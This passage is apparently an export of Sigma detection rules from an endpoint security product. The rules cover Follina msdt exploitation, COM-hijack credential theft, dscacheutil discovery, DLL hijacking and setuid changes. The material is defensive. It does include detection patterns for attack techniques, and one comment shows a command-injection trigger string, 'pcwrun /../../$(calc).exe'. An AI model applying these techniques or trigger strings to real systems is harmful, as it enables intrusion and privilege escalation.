C:\\WINDOWS\\diagnostics\\system\\networking -elev {8FE9353F-43C4-40E3-9C56-299E82D1BF49} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDFF5EF.tmp -modal 0007081A -ep NetworkDiagnosticsWeb -elevated yes\n # C:\\WINDOWS\\system32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\system\\networking -elev {D2E49F22-A2A9-4473-94F4-00427DB6A44E} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDF6BDC.tmp -ep NetworkDiagnosticsGenericNetConnection -elevated yes\n - 'msdt.exe -path ?:\\WINDOWS\\diagnostics\\system\\networking -elev {????????-????-????-????-????????????} -skip force -af ?:\\Users\\'\n\n # We can trigger this vulnerability using pcwrun.exe (pcwrun /../../$(calc).exe) that spawn msdt.exe (C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW3C69.xml /skip TRUE).\n # So, we exclude legitimate usage of pcwrun.exe that spawn msdt.exe.\n exclusion_PCWDiagnostic:\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCWC9F3.xml /skip TRUE\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW9D5A.xml /skip TRUE\n CommandLine|startswith: '?:\\windows\\System32\\msdt.exe -path ?:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af ?:\\'\n # C:\\windows\\system32\\pcwrun.exe C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\n # C:\\windows\\system32\\pcwrun.exe C:\\Program Files\\LibreOffice\\program\\soffice.exe ContextMenu\n ParentCommandLine:\n - '?:\\windows\\system32\\pcwrun.exe *'\n - '?:\\windows\\system32\\pcwrun.exe'\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be303eba-4ffb-48f8-98da-8df78e6af4b7",
"rule_name": "Possible Follina CVE-2022-30190 Vulnerability Exploitation",
"rule_description": "Detects the possible exploitation of CVE-2022-30190 (aka Follina), a Microsoft Office code execution vulnerability that uses ms-msdt scheme to execute malicious code.\nAttackers can use Follina to execute code as part of their initial compromise by luring users into clicking on infected Office documents.\nIt is recommended to analyze the opened Office document as well as to investigate processes stemming from the vulnerability exploitation.\n",
"rule_creation_date": "2022-05-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be692d57-801a-4187-81bc-0cb99ce4afbc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074916Z",
"creation_date": "2026-03-23T11:45:34.074918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.slowerzs.net/posts/thievingfox/",
"https://github.com/Slowerzs/ThievingFox/",
"https://attack.mitre.org/techniques/T1056/004/"
],
"name": "t1056_004_thievingfox_com_hijack.yml",
"content": "title: Possible Credential Theft via COM Hijack\nid: be692d57-801a-4187-81bc-0cb99ce4afbc\ndescription: |\n Detects the modification of COM-related registry keys that can be used to gather credentials.\n Attackers may exploit COMs to hijack execution flow and load arbitrary libraries in new processes as a means to steal credentials.\n It is recommended to check whether the modification is expected and to analyze the library pointed to by the modified registry key.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://github.com/Slowerzs/ThievingFox/\n - https://attack.mitre.org/techniques/T1056/004/\ndate: 2024/02/13\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1056.004\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_write:\n EventType: 'SetValue'\n\n selection_key_consent_1:\n TargetObject|endswith: '\\CLSID\\{745A5ADD-6A71-47B9-9BB9-31DD3A6913D4}\\InprocServer32\\(Default)'\n selection_expected_consent_1:\n Details: '%SystemRoot%\\System32\\authui.dll'\n\n selection_key_consent_2:\n TargetObject|endswith: '\\CLSID\\{96B42929-01F1-468C-B521-6294AB438F4A}\\InprocServer32\\(Default)'\n selection_expected_consent_2:\n Details: '%SystemRoot%\\System32\\windows.ui.creddialogcontroller.dll'\n\n selection_key_logonui_1:\n TargetObject|endswith: '\\CLSID\\{2135F72A-90B5-4ED3-A7F1-8BB705AC276A}\\InprocServer32\\(Default)'\n selection_expected_logonui_1:\n Details:\n - '%SystemRoot%\\System32\\authui.dll'\n - '%SystemRoot%\\system32\\credprovslegacy.dll'\n - 'acnampwdcredprovider.dll'\n\n selection_key_logonui_2:\n TargetObject|endswith: '\\CLSID\\{0BDC6FC7-83E3-46A4-BFA0-1BC14DBF8B38}\\InprocServer32\\(Default)'\n selection_expected_logonui_2:\n Details: '%SystemRoot%\\System32\\logoncontroller.dll'\n\n selection_key_msmpeg2vdec:\n TargetObject|endswith: '\\CLSID\\{62CE7E72-4C71-4D20-B15D-452831A87D9D}\\InprocServer32\\(Default)'\n selection_expected_msmpeg2vdec:\n Details:\n - '%SystemRoot%\\System32\\msmpeg2vdec.dll'\n - '?:\\Windows\\SysWOW64\\msmpeg2vdec.dll'\n - '?:\\Windows\\system32\\msmpeg2vdec.dll'\n\n selection_key_mstscax:\n TargetObject|endswith:\n - '\\CLSID\\{8B918B82-7985-4C24-89DF-C33AD2BBFBCD}\\InprocServer32\\(Default)'\n - '\\CLSID\\{4EB89FF4-7F78-4A0F-8B8D-2BF02E94E4B2}\\InprocServer32\\(Default)'\n - '\\CLSID\\{A1230401-67a5-4df6-a730-dce8822c80c4}\\InprocServer32\\(Default)'\n selection_expected_mstscax:\n Details:\n - '%systemroot%\\system32\\mstscax.dll'\n - '?:\\Windows\\System32\\mstscax.dll'\n\n condition: selection_write and (\n (selection_key_consent_1 and not selection_expected_consent_1)\n or (selection_key_consent_2 and not selection_expected_consent_2)\n or (selection_key_logonui_1 and not selection_expected_logonui_1)\n or (selection_key_logonui_2 and not selection_expected_logonui_2)\n or (selection_key_mstscax and not selection_expected_mstscax)\n or (selection_key_msmpeg2vdec and not selection_expected_msmpeg2vdec)\n )\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be692d57-801a-4187-81bc-0cb99ce4afbc",
"rule_name": "Possible Credential Theft via COM Hijack",
"rule_description": "Detects the modification of COM-related registry keys that can be used to gather credentials.\nAttackers may exploit COMs to hijack execution flow and load arbitrary libraries in new processes as a means to steal credentials.\nIt is recommended to check whether the modification is expected and to analyze the library pointed to by the modified registry key.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1056.004",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "beb6c599-6b26-415f-bd79-23d6a4c87642",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095069Z",
"creation_date": "2026-03-23T11:45:34.095071Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095075Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1069_002_dscacheutil_discovery_groups_macos.yml",
"content": "title: Groups Listed via dscacheutil\nid: beb6c599-6b26-415f-bd79-23d6a4c87642\ndescription: |\n Detects the execution of the dscacheutil command to query information about groups.\n Adversaries can use this information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/07/01\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscacheutil\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q group'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.microsoft.wdav.??????/preinstall /Library/Caches/com.microsoft.autoupdate.helper/wdav-upgrade.pkg /Applications / /'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n exclusion_mdatp:\n CommandLine: '/usr/bin/dscacheutil -q group -a name _mdatp'\n ParentCommandLine|contains: '/postinstall /Library/Caches/com.microsoft.autoupdate.helper/wdav-upgrade.pkg'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "beb6c599-6b26-415f-bd79-23d6a4c87642",
"rule_name": "Groups Listed via dscacheutil",
"rule_description": "Detects the execution of the dscacheutil command to query information about groups.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-07-01",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bef1e86b-dd5e-45e3-b788-14d8427f649c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589601Z",
"creation_date": "2026-03-23T11:45:34.589605Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589617Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dispdiag.yml",
"content": "title: DLL Hijacking via dispdiag.exe\nid: bef1e86b-dd5e-45e3-b788-14d8427f649c\ndescription: |\n Detects potential Windows DLL Hijacking via dispdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dispdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DXVA2.dll'\n - '\\WMICLNT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bef1e86b-dd5e-45e3-b788-14d8427f649c",
"rule_name": "DLL Hijacking via dispdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dispdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.587203Z",
"creation_date": "2026-03-23T11:45:35.297550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297554Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setuid_setgid.yml",
"content": "title: SetUID/SetGID Access Flags Set\nid: bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062\ndescription: |\n Detects when the setuid and/or setgid access flags are set on a given file.\n These access flags allow a user to run a binary using the executable's owner or group permissions instead of its own, and can be a means to achieve privilege escalation by a malicious party.\n It is recommended to analyze the targeted binary as well as the parent process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/11/10\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode:\n - '2???'\n - '4???'\n - '6???'\n Path|startswith:\n - '/home/'\n - '/root/'\n - '/opt/'\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/tmp/'\n - '/var/tmp/'\n - '/run/'\n - '/var/run/'\n - '/dev/shm/'\n - '/var/www/'\n\n filter_directory:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -r '\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/apptainer'\n - '/usr/bin/buildah'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|/usr/bin/apt|'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/docker'\n - '/usr/bin/dockerd-ce'\n - '*/dockerd'\n - '*/containerd'\n - '*/containerd-shim-runc-v2'\n - '/usr/bin/buildkitd'\n - '/usr/local/lsam-*/bin/chgexec'\n - '/kaniko/executor'\n - '/sbin/apk'\n - '/usr/bin/rsync'\n - '/usr/bin/tar'\n - '/usr/bin/nautilus'\n - '/usr/bin/podman'\n - '/usr/lib/openssh/sftp-server'\n - '/usr/bin/cpio'\n - '/usr/bin/cp'\n - '/usr/bin/mv'\n - '/usr/bin/fuse-overlayfs'\n - '/usr/bin/unsquashfs'\n - '/usr/bin/bsdtar'\n - '/usr/bin/systemd-repart'\n - '/usr/bin/coreutils'\n - '/opt/cni/bin/install' # k3s calico\n - '/usr/bin/strip'\n\n exclusion_postfix:\n ProcessCommandLine:\n - 'chmod 2755 /usr/sbin/postqueue'\n - 'chmod 2755 /usr/sbin/postdrop'\n ProcessParentCommandLine|contains: '/sh /usr/libexec/postfix/post-install create-missing set-permissions upgrade-configuration '\n exclusion_initramfs:\n ProcessImage:\n - '/usr/bin/strip'\n - '/usr/bin/cp'\n ProcessCommandLine|contains: ' /var/tmp/dracut.??????/initramfs/'\n exclusion_landscape:\n ProcessParentCommandLine: '/bin/sh /var/lib/dpkg/info/landscape-client.postinst configure'\n\n exclusion_yocto_sdk:\n # /opt/yocto/yocto-sdk/sources/poky/buildtools/sysroots/x86_64-pokysdk-linux/usr/bin/x86_64-pokysdk-linux-strip\n # /opt/yocto/yocto-sdk/build_lx2160acex7/tmp/work/lx2160acex7-fsl-linux/core-image-cmtng/1.0-r0/recipe-sysroot-native/usr/bin/python3-native/python3.8\n # /opt/yocto/kirkstone/build_lx2160acex7/tmp/work/lx2160acex7-fsl-linux/core-image-louis/1.0-r0/recipe-sysroot-native/usr/bin/dpkg\n - ProcessImage|startswith: '/opt/yocto/'\n - Path|startswith: '/opt/yocto/'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_vmware:\n ProcessCommandLine|contains: 'vmware-install'\n\n exclusion_file_roller:\n ProcessImage: '/usr/bin/file-roller'\n ProcessParentCommandLine|contains: '/lib/systemd/systemd --user'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_vtom:\n ProcessCommandLine|contains|all:\n - 'chmod 4755'\n - '/opt/vtom'\n ProcessParentCommandLine|contains: 'install_vtom'\n\n exclusion_isa:\n - ProcessParentCommandLine: '/bin/bash /etc/init.d/isa status'\n - ProcessGrandparentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_k3s_agent:\n ProcessParentImage:\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/opt/rancher/data/*/bin/k3s'\n\n exclusion_moodle:\n Path|startswith:\n - '/srv/moodle/'\n - '/var/opt/moodle/'\n\n exclusion_oc-mirror:\n ProcessImage|endswith: '/oc-mirror'\n ProcessCommandLine|contains:\n - ' --catalog'\n - ' --config'\n\n exclusion_opcon_agent:\n ProcessImage: '/tmp/opcon_agent/bin/chgexec'\n Path|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_netdata:\n ProcessParentImage: '/opt/netdata/bin/bash'\n Path|startswith: '/opt/netdata/usr/libexec/netdata/plugins.d/'\n\n exclusion_dracut:\n Path|startswith: '/var/tmp/dracut.*/initramfs/usr/bin/'\n\n exclusion_convert2rhel:\n ProcessParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_bladelogic:\n Path|startswith: '/opt/bmc/bladelogic/RSCD/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062",
"rule_name": "SetUID/SetGID Access Flags Set",
"rule_description": "Detects when the setuid and/or setgid access flags are set on a given file.\nThese access flags allow a user to run a binary using the executable's owner or group permissions instead of its own, and can be a means to achieve privilege escalation by a malicious party.\nIt is recommended to analyze the targeted binary as well as the parent process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bfa22e53-0d1e-4743-9891-9cc61f48816f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
